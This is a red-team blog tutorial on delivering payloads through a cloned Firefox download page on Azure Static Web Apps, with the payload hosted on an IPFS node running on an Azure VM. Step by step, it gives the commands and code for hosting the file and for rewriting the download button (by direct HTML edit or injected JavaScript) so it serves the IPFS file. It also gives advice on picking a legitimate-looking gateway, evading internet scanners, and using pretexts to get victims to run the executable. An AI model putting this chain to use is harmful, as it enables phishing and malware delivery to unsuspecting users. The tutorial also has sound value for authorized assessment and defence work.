CLOUD SECURITY

Payload Delivery with Azure Static Website and IPFS Dropper

Nairuz Abulhul
Published in R3d Buck3T · 14 min read · May 22, 2024


Weaponizing InterPlanetary File System and Azure Sites


A Red Team assessment typically involves carrying out social engineering activities like phishing through emails or vishing by directly calling the targets. The list of targets is usually gathered in the early stages of the operation from public platforms such as LinkedIn, Hunter.io, ZoomInfo, etc.

The end goal is to deliver a payload to the targeted group to gain access to the internal network. There are various methods of delivering payloads; one of them is IPFS (InterPlanetary File System), a protocol designed to create a decentralized peer-to-peer network for storing and sharing data.

In this guide, we will use the Azure environment to set up an IPFS node on an Azure virtual machine to host our payload. We will also learn how to clone a website to make it appear legitimate for the assessment and host it on an Azure static website.

🚩Disclaimer: This is for educational purposes only to demonstrate how threat actors can use these techniques for social engineering attacks. Be responsible, and don’t perform any illegal activities!


Creating Azure VM

We will use an Azure VM to install IPFS. In the Red Teaming in the Cloud series, we covered the process of deploying the VM. I’ll share links to the sections that explain setting up the VM and connecting to it, so we can use it for IPFS.

Installing IPFS

After setting up the virtual machine and connecting to it, we download the Kubo (go-ipfs) distribution, available on the IPFS Distribution site.

Kubo is an IPFS implementation written in Go. It provides all the functionality required to interact with the IPFS network, including running nodes, storing and retrieving data, and communicating with other peers.

For our setup, we selected the Linux x64 (amd64) build, which is compatible with the Azure machine created in the previous step. To install Kubo, use wget or curl to download the archive.

Figure 1 — shows the Kubo (go-ipfs) package
wget https://dist.ipfs.tech/kubo/v0.28.0/kubo_v0.28.0_linux-amd64.tar.gz
Figure 2 — shows installing kubo (go-ipfs) on the Azure VM
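The curl equivalent of the same download would be:

#Download the same Kubo archive with curl instead of wget
curl -LO https://dist.ipfs.tech/kubo/v0.28.0/kubo_v0.28.0_linux-amd64.tar.gz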

Then, extract the archive, change into the resulting “kubo” directory, and run the install script. Make sure to run the script as root to avoid permission errors.

When running the script for the first time, it will move the “ipfs” executable to /usr/local/bin/.

tar -xf kubo_v0.28.0_linux-amd64.tar.gz

cd kubo

sudo ./install.sh
Figure 3 — shows extracting the Kubo files and running the install script

To verify the installation, run the ipfs command.

ipfs
Figure 4 — shows running ipfs

After installing IPFS, we can create a directory named “files” to store the files we want to share. This step is optional, but it helps keep the workspace organized.
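A minimal sketch of that step, assuming the same home-directory layout used with scp below:

#On the Azure VM: create a working directory for the files we want to share
mkdir -p ~/ipfs/files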

For this demonstration, we will use Windows Calculator as an example of a hosted file to represent a payload: %WinDir%\System32\calc.exe. We will use the scp command to upload the calc.exe to the files directory on the VM.

sudo scp -i IPFS-VM_key.pem calc.exe azureuser@Azure_VM_IP:/home/azureuser/ipfs/files
Figure 5 — showing uploading the file to the VM

When setting up an IPFS node, you need to run the command ipfs init. An IPFS node is essentially a computer or device connected to the IPFS network, such as a laptop, desktop, server, or smartphone.

When you initialize a node for the first time, it generates a peer identity (a CID) that stays the same every time you run IPFS on that node. A CID serves as a unique fingerprint for a piece of data stored within the IPFS network.

ipfs init
Figure 6 — shows starting the ipfs node

The peer CID, along with other configuration information, is saved in the “config” file located in the .ipfs directory in the home directory.

Figure 7 — shows the location and content of the IPFS config file
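If you want to confirm the peer identity from the terminal, Kubo's built-in ipfs id command prints it, or you can read it straight from the config file:

#Print the peer identity and addresses of this node
ipfs id

#Or pull it directly from the config file
grep PeerID ~/.ipfs/config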

To start the node, use the ipfs daemon command. This launches the IPFS daemon in the foreground; you can use screen to run it in the background.

ipfs daemon

#Alternatively, start a screen session (the name can be anything)
screen -S session_name

ipfs daemon

#Leave the IPFS daemon running in the background and return to the terminal:
#press Ctrl + A followed by Ctrl + D

#List the available sessions
screen -ls

#Return to the IPFS session
screen -r sessionID
#ex: screen -r 12345

When you see the Swarm information, it means the daemon is ready. In the IPFS context, “Swarm” refers to the component responsible for managing peer-to-peer connections and data exchange among nodes.

Figure 8 — shows starting the ipfs node

IPFS Web Interface

The web interface can be accessed at localhost:5001/webui (port 5001 is the default). To avoid opening another port in the VM firewall, we can use local port forwarding to access the interface from our testing machine.

This approach is better from an operational security perspective, as it avoids getting detected by internet scanners and flagged for suspicious activity. The only port that should be open to the public is port 22 for SSH.

To set up local port forwarding, we can either exit the current SSH session and re-SSH with the -L flag or use the SSH command on the current session.

The option -L 5001:127.0.0.1:5001 creates a tunnel that forwards connections from port 5001 on our local machine (Kali) to port 5001 on the remote server’s loopback interface (127.0.0.1).

This means that any traffic sent to 127.0.0.1:5001 on our local machine will be redirected through the SSH tunnel to the remote server’s 127.0.0.1:5001.

ssh azureuser@Azure_VM_IP -i Azure_VM_KEY.pem -L 5001:127.0.0.1:5001
Figure 9 — shows the IPFS web interface

To upload a file, click the “Files” option in the side menu and import our file, calc.exe.

Figure 10 — shows uploading the file

Once the file is uploaded, it will receive a CID hash that cannot be changed. If you modify the file, a new hash value will be generated. To obtain the public link for the uploaded file, click on the three dots on the side and select “Share link”.

Figure 11 — shows getting the shared link for the uploaded file

We will embed this link in the cloned site that we create in the next steps.

Figure 12 — shows the shared link

The file we uploaded may take several minutes to be broadcast to the IPFS network. Once it’s available, we can access and download the file. The default public gateway is https://ipfs.io, but we can change it to any of the gateways listed on the IPFS Public Gateways page.

We will change the default gateway to the Cloudflare IPFS gateway, as it looks more legitimate, and use that link on the Azure site.

https://cloudflare-ipfs.com/ipfs/FILE_CID_HASH
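If you prefer the CLI over the web UI, ipfs add produces the same CID used to build the gateway link. A quick sketch (the exact output format may vary by Kubo version):

#On the VM: add the payload to IPFS and note the CID that gets printed
cd ~/ipfs/files
ipfs add calc.exe
#added <FILE_CID_HASH> calc.exe   -> use this hash in the gateway URL above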

To stop the running daemon, run ps aux, find the IPFS PID, and run the kill command with that PID number to stop the process.

ps aux | grep ipfs

sudo kill -9 PID_NUMBER
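Kubo also provides a graceful way to stop the daemon without hunting for the PID, which recent versions support:

#Gracefully shut down the running IPFS daemon
ipfs shutdown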

Setting up Azure Static website

In this section, we will set up the Azure static website to host the cloned website we will create in the next step. To begin, search for “Static Web Apps” in the Azure portal and click “Create static web app”.

Figure 13 — shows creating a new static web app

Then, fill out the “Project Details” by selecting the subscription and resource group. When using any Azure services, it’s necessary to create a subscription first. This allows Microsoft to track the services used and bill the user accordingly. Instructions for creating a subscription are in the Red Teaming in the Cloud: Deploying Azure VMs for C2 Infrastructure guide.

Next, choose an existing “Resource group” or click “Create new” if you don’t have one set up already. Choose a name for the site, select “Free” for the “Hosting plan”, and “Other” for the “Deployment details”.

Figure 14 — shows creating a static website

Then, move to the next steps and select the default options, as seen in the screenshots below.

Figure 15 — shows selecting the Azure functions and staging details

Next, add tags. Tags are like labels that can be attached to any Azure service to help manage and track resource costs.

Figure 16 — shows adding tags

Lastly, review the added information and click “Create”. It takes a few seconds to create. Once the site is deployed, we’ll see a “Your deployment is complete” message. Click on “Go to resource”.

Figure 17 — shows deploying the site profile.
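For reference, the same resource can be created from the command line with the Azure CLI. A rough equivalent, with placeholder names and flags that may vary by CLI version, looks like this:

#Create an empty Static Web App on the Free plan (names are placeholders; code is deployed later with swa)
az staticwebapp create --name my-clone-site --resource-group MyResourceGroup --sku Free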

In the newly created site, click on the “Overview” section to view all the details about the site.

Figure 18 — shows the site’s overview details

Next, navigate to the site’s URL. The screenshot below shows the default page of a newly created static site. We can use a custom domain to create something more meaningful than blue-meadow-0eeaa7210.5, but this is outside the scope of this article; we’ll discuss it in future posts.

Figure 19 — shows the default page of the Microsoft static website

Cloning Website

After creating the static site, we need to clone a website that looks legitimate to the end-user and aligns with our ruse for the social engineering assessment. We can clone the client’s official site, showcasing the tools they use, or the download page if they sell applications.

It’s crucial to have a clean cloned site to appear legitimate. There are Chrome extensions that save a complete webpage as a single HTML file with all assets (images, CSS, etc.) embedded; install one of them before proceeding (Save Page WE is the one used below).

For this demonstration, we will use the Firefox download page as an example. To clone the page, navigate to the download page and click on the Save Page WE extension; it downloads the HTML page locally. The screenshot below shows the cloned page.

Figure 20 — shows the cloned page

Once cloned, create a new directory and place the cloned page inside it. We’ll name the project “CloneSite”. In the next step, we will modify the HTML code to replace the official download link with the link to the payload hosted on the IPFS.
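If a browser extension is not an option, a command-line mirror can serve as a rough substitute. The sketch below uses wget as an alternative technique; the result usually needs more cleanup than the single-file extensions produce:

#Mirror the target page with its assets and rewrite links for offline use
wget --page-requisites --convert-links --adjust-extension --no-parent https://TARGET_PAGE_URL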

Installing NodeJS & NPM

Next, we need to install the Node Package Manager (npm). It is recommended to install Node.js with npm bundled to ensure compatibility and simplify the process.

For Windows, visit the official Node.js download page and run the Windows installer.

Figure 21 — shows installing Node.js
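Alternatively, Node.js can be installed from a terminal with winget; the package ID below is an assumption, so confirm it with winget search nodejs first:

#Install the Node.js LTS release, which bundles npm
winget install OpenJS.NodeJS.LTS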

After installation, ensure that the Node.js and npm paths have been added to the “Path” system environment variable. Check this by opening a PowerShell terminal and running $env:path, or add them manually by appending the Node.js and npm directories.

$env:path = "$env:path;C:\Program Files\nodejs;C:\Users\User\AppData\Roaming\npm"
Figure 22 — shows the Node.js and npm paths added to the system variables

Then, before we run npm, we need to bypass the PowerShell execution policy to be able to run the npm.ps1 script. Otherwise, we will run into the error below.

#Bypass Policy  
powershell -executionpolicy bypass
Figure 23 — shows the error when running the npm.ps1 script

After that, we run npm -v to quickly check the npm version and ensure that we can run npm commands in the terminal. As seen below, the command returned the currently installed version.

npm -v
Figure 24 — shows retrieving the version of the npm

Installing SWA CLI Tool

To deploy the cloned page from our machine to the Azure static site, we will use the Static Web Apps CLI (swa) tool.

Figure 25 — shows the Static Web Apps CLI tool

Before proceeding with the installation of swa, make sure to install Python 3.12 from the Microsoft Store. If you already have python3 installed, you can skip this step.

Figure 26 — shows Python 3 on the Microsoft Store

Then, open Visual Studio, select the directory we created earlier, “CloneSite”, and open the terminal by going to View > Terminal.

Figures 27 & 28 — show Visual Studio

Next, bypass the PowerShell execution policy and install the swa tool by running the command below.

#Bypass Policy  
powershell -executionpolicy bypass
npm install -g @azure/static-web-apps-cli
Figure 29 — shows installing the swa tool

Code Deployment

Now that we have everything ready to push the code, we can embed the IPFS payload URL directly into the HTML code or use JavaScript to replace the original URL with ours. I’ll include both methods for learning purposes.

Go back to the cloned page and use the browser’s built-in developer tools to inspect the HTML “id” of the download button — download-button-desktop-release-win.

Figure 30 — shows getting the id name in the HTML

Search for the “id” in Visual Studio, and replace the original download URL with the IPFS URL, then save it.

HTML
<!-- Method 1: replace the original download URL in the existing anchor tag -->
<a class="download-link os_win mzp-t-xl mzp-c-button mzp-t-product ga-product-download"
id="download-button-desktop-release-win"
href="https://cloudflare-ipfs.com/ipfs/FILE_CID_HASH" data-link-type="download"
data-display-name="Windows 32-bit"
data-download-version="win"
data-download-os="Desktop"
data-download-location="primary cta">

<!-- Method 2: place this code at the end of the file, before </body></html> -->
<a href="https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US" id="download-button-desktop-release-win"> </a>
<script>
var element = document.getElementById("download-button-desktop-release-win");
element.href = "https://cloudflare-ipfs.com/ipfs/FILE_CID_HASH";
</script>

In the developer terminal, log in to the Azure portal with the swa login command to obtain a session that will enable us to push the code.

swa login
Figure 31 — shows logging into the Azure portal with the swa tool

Once authenticated, it redirects to a localhost page on port 31337, stating that the authentication was complete. Sometimes, the page doesn’t pop up quickly after the authentication. If that happens, run the swa login command again.

Figure 32 — shows successful authentication with swa

In the terminal, we can see that we have successfully authenticated to Azure and are presented with the available tenants. We can choose the tenant where our static site will be located.

Figure 33 — shows the available tenants

To check your current working tenant, access the Azure portal and click the Terminal icon on the top right, next to your account name.

Once the terminal is active, run the Get-AzTenant command. It will provide you with the tenant information, such as the ID and the domain it’s connected to. Back in the swa prompt, use the arrow keys to select which tenant to use, and press Enter.

Get-AzTenant
Figure 34 — shows running the Az PowerShell command to get the available tenants.

After logging in with swa, a new .env file is created in the CloneSite directory. This file contains the subscription ID and the tenant ID that will be used for code deployment.
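The variable names below illustrate what swa login typically writes to that .env file; the values are placeholders, so check your own file:

#Example .env created by swa login (placeholder values)
AZURE_SUBSCRIPTION_ID=00000000-0000-0000-0000-000000000000
AZURE_TENANT_ID=00000000-0000-0000-0000-000000000000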

To deploy the code with swa, you need to create a configuration file in the same directory by running swa with no arguments. This initializes the configuration file and asks if you want to name it after the site.

Keep it as default and press enter. When asked if the settings are correct, press “Y”.

Figure 35 — shows running swa to set up the configuration file

When prompted to deploy to your app, type “Y” and press Enter. If asked whether you want to create a new app, type “N” and press Enter.

Figure 36 — shows continuing with the swa configuration setup

Since we already have an app created, we will use the deployment token to deploy our app. The deployment token method is useful when you have multiple apps created and want to specify which ones to deploy to.

To obtain the deployment token, go to the Azure portal, navigate to the static site we created, and in the overview section, click on “Manage Deployment Token”, then copy the token.

Figure 37 — shows the location of the deployment token.

After running the swa command, the configuration file will be created as a JSON file called swa-cli.config.json in the main CloneSite directory.

Figure 38 — shows the created configuration file with swa
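Its contents look roughly like the following; the app name and paths reflect this project, and the exact fields should be treated as an illustration of the CLI output rather than a definitive schema:

{
  "$schema": "https://aka.ms/azure/static-web-apps-cli/schema",
  "configurations": {
    "CloneSite": {
      "appLocation": ".",
      "outputLocation": "."
    }
  }
}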

💡An important tip: if you place your index.html file directly in the CloneSite directory, SWA will not deploy it. It won’t display errors, but the website will be empty.

To avoid this, create a new directory called “firefox-clone-site” and place your code (the index.html) there. The directory structure is shown in the screenshot below.

Also, make sure to name your HTML page as “index.html” with a lowercase “i”; otherwise, it won’t deploy.

Figure 39 — shows the directory structure
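In plain text, the layout based on the names above is:

CloneSite/
├── swa-cli.config.json
├── .env
└── firefox-clone-site/
    └── index.html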

Now that we have the proper structure for the project, we can deploy it with the swa deploy command, specifying the environment as “production”. If the environment is not specified, the project will be deployed to a preview environment instead of production.

swa deploy .\CloneSite\firefox-clone-site\ --deployment-token TOKEN --env production
Figure 40 — shows the deployed code on the Azure static website

When we click the download button, we get the file hosted on IPFS. Browser behavior varies: Edge and Firefox download it directly, as shown in the screenshot.

Figure 41 — shows downloading the calc.exe file in Edge

Chrome, on the other hand, prompts with a “Save As” window to save the executable. In a social engineering assessment, this doesn’t matter much as long as we have a good pretext to convince the user to run the executable.

Figure 42 — shows downloading the calc.exe file in Chrome

To make it appear more legitimate, we can specify a custom domain instead of “blue-meadow-0eeaa7210.5”. We won’t include it in this post, but we will cover it in future posts.

Today, we learned how to set up an IPFS node on an Azure VM and host a payload file. Then, we cloned a website and deployed it to an Azure static website that links to the IPFS-hosted payload.

That’s all for today, see you next time!
